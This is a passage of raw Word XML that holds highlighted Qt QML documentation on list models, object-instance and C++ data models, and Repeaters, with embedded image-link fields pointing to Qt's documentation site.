      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>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VisualItemModel</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itemModel</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Rectangle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height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30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80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color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"red"</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Rectangle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height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30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80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color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"green"</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Rectangle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height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30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80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color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"blue"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ListView</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fill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model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itemModel</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4AF0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that in the above example there is </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4AF0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no delegate required</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The items of the model itself provide the visual types that will be positioned by the view.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2309" w:name="integers-as-models"/>
      <w:bookmarkStart w:id="2310" w:name="_Toc483001028"/>
      <w:bookmarkStart w:id="2311" w:name="_Toc483004019"/>
      <w:bookmarkStart w:id="2312" w:name="_Toc483604369"/>
      <w:bookmarkStart w:id="2313" w:name="_Toc483605589"/>
      <w:bookmarkEnd w:id="2309"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Integers as Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2310"/>
      <w:bookmarkEnd w:id="2311"/>
      <w:bookmarkEnd w:id="2312"/>
      <w:bookmarkEnd w:id="2313"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An integer can be used as a model that contains a certain number of types. In this case, the model does not have any data roles.</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 xml:space="preserve">The following </w:t>
      </w:r>
      <w:r w:rsidRPr="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2591" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with five elements:</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Item</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200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height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250</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Component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itemDelegate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"I am item number: "</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index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ListView</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fill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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        model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5</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delegate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itemDelegate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200A6">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2314" w:name="object-instances-as-models"/>
      <w:bookmarkStart w:id="2315" w:name="_Toc483001029"/>
      <w:bookmarkStart w:id="2316" w:name="_Toc483004020"/>
      <w:bookmarkStart w:id="2317" w:name="_Toc483604370"/>
      <w:bookmarkStart w:id="2318" w:name="_Toc483605590"/>
      <w:bookmarkEnd w:id="2314"/>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Object Instances as Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2315"/>
      <w:bookmarkEnd w:id="2316"/>
      <w:bookmarkEnd w:id="2317"/>
      <w:bookmarkEnd w:id="2318"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14930">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An object instance can be used to specify a model with a single object type. The properties of the object are provided as roles</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14930">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> below creates a list with one item, showing the color of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myText</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">text. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14930">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the use of the fully qualified</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model.color</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to avoid clashing with</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of the Text type in the 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Rectangle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200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height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250</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myText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"Hello"</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color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"#dd44ee"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Component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id</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myDelegate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Text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text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model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color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ListView</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fill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parent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anchors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topMargin</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30</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model</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myText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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</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myDelegate</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200A6">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2319" w:name="qml-c-models"/>
      <w:bookmarkStart w:id="2320" w:name="c-data-models"/>
      <w:bookmarkStart w:id="2321" w:name="_Toc483001030"/>
      <w:bookmarkStart w:id="2322" w:name="_Toc483004021"/>
      <w:bookmarkStart w:id="2323" w:name="_Toc483604371"/>
      <w:bookmarkStart w:id="2324" w:name="_Toc483605591"/>
      <w:bookmarkEnd w:id="2319"/>
      <w:bookmarkEnd w:id="2320"/>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ Data Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2321"/>
      <w:bookmarkEnd w:id="2322"/>
      <w:bookmarkEnd w:id="2323"/>
      <w:bookmarkEnd w:id="2324"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14930">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Models can be defined in C++ and then made available to QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14930">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mechanism is useful for exposing existing C++ data models or otherwise complex datasets to QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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For information, visit the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2592" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using C++ Models with Qt Quick Views</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>article.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="006200A6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2325" w:name="repeaters"/>
      <w:bookmarkStart w:id="2326" w:name="_Toc483001031"/>
      <w:bookmarkStart w:id="2327" w:name="_Toc483004022"/>
      <w:bookmarkStart w:id="2328" w:name="_Toc483604372"/>
      <w:bookmarkStart w:id="2329" w:name="_Toc483605592"/>
      <w:bookmarkEnd w:id="2325"/>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Repeaters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2326"/>
      <w:bookmarkEnd w:id="2327"/>
      <w:bookmarkEnd w:id="2328"/>
      <w:bookmarkEnd w:id="2329"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/repeater-index.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1080" type="#_x0000_t75" alt="" style="width:57.6pt;height:129.6pt">
            <v:imagedata r:id="rId2593" r:href="rId2594"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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 xml:space="preserve">Repeaters </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14930">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create items from a template for use with positioners, using data from a model</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Combining repeaters and positioners is an easy way to lay out lots of items</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A</w:t>
      </w:r>
      <w:r w:rsidR="00F14930">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2595" w:history="1">
        <w:r w:rsidRPr="00882993">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Repeater</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F14930">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">item is </w:t>
      </w:r>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>placed inside a positioner</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generates items that the enclosing positioner arranges</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each Repeater</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a number of items by combining each element of data from a model, specified using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2596" w:anchor="model-prop" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>model</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property, with the template item, defined as a child item within the Repeater. The total number of items is determined by the amount of data in the model.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following example shows a repeater used with a Grid item to arrange a set of Rectangle items. The Repeater item creates a series of 24 rectangles for the Grid item to position in a 5 by 5 arrangement.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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
